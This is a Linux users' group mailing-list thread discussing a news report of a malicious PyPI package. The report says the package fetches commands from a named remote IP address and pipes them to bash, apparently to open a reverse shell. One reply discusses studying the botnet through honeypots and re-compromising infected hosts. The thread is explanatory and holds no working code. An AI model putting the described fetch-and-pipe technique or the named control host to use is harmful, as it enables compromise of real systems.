Re: [PLUG] botnet, backdoor

That only disables the propagation. Any hosts already snagged are probably converted to a different C3 host and still active. Taking down the original host prevents new growth, but it also makes it much harder to research and counter. With a live indoctrination host, you can add your honeypots to the botted swarm and get live info. Without fresh indocs, you have to try to track down an already compromised host, compromise it again, and ride along that way.

On Mon, May 23, 2022 at 11:11 AM Mark Bergman via plug <plug@lists.phillylinux.org> wrote:

In the message dated: Mon, 23 May 2022 10:42:55 -0400,
The pithy ruminations from jeffv via plug on
[[PLUG] botnet, backdoor] were:
=>
=> Malicious PyPI package opens backdoors on Windows, Linux, and Macs
=>
=> https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/
=>
=>
=> For Linux systems, the Python script connects to a remote URL at
=> 39.107.154.72 and pipes the output to the bash shell. Unfortunately,

There seems to have been an editing mistake .... The "reporter" from bleepingcomputer probably meant to write:

Fortunately, that host is down, disabling the C&C aspects of the botnet and rendering it harmless.

=> that host is down at the time of this writing, so it is unclear what
=> commands are executed, but it is believed to open a reverse shell.
=>

--
Mark Bergman Biker, Rock Climber, SCUBA Diver, Unix mechanic, IATSE #1 Stagehand
'94 Yamaha GTS1000A^1 2015 Aprilia Caponord
https://www.flickr.com/photos/rmsppu

___________________________________________________________________________
Philadelphia Linux Users Group -- http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug